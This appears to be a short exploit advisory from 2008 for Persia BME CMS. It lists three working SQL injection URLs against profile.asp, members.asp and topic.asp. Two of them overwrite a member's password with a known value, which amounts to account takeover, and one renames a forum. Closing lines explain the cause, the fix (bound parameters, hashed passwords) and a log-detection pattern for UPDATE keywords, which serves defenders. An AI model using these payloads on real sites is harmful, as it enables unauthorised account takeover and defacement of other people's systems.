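Persia BME CMS Multiple Remote Vulnerabilities
#site : www.persiabme.com
#Author : Q7x
#e-mail : Larestankids[at]yahoo[dot]com
# -== Ashiyane2 Research Group ==- Www.Larestankids.coM
#
#
#UPDATE Members
#member.member_id=MEMBER_ID, for example member.member_id=1
#Profile.asp Remote SQL Injection
#members.asp Remote SQL Injection
http://www.target.com/path/forums/profile.asp?ucode=1 UPDATE member SET member.pass='q7x' where member.member_id=1--
http://www.target.com/path/register/members.asp?find=' UPDATE member SET member.pass='q7x' where member.member_id=1--&sort=member_id&arrow=desc
#Password : q7x
#Topic.asp Remote SQL Injection
#Update Forum Name
http://www.target.com/path/forums/topic.asp?fid=1 UPDATE forum SET forum.name='q7x' where forum_id=62
#
#Cause : in all three pages the query-string value (ucode, find, fid) evidently reaches the SQL statement unescaped, so a second statement appended to the parameter is executed with the site's database rights.
#Fix : pass ucode, find and fid as bound parameters (e.g. ADODB.Command parameters) instead of concatenating them, reject non-numeric ucode/fid, and give the web application's database login no more rights than the pages need.
#Note : the request above sets member.pass to the same value given as the login password, which suggests passwords are stored unhashed; store a salted hash instead.
#Detection : requests to profile.asp, members.asp or topic.asp whose query string contains SQL keywords such as UPDATE or a trailing -- are worth alerting on in web server logs.
Larestankids.coM [2008/01/26]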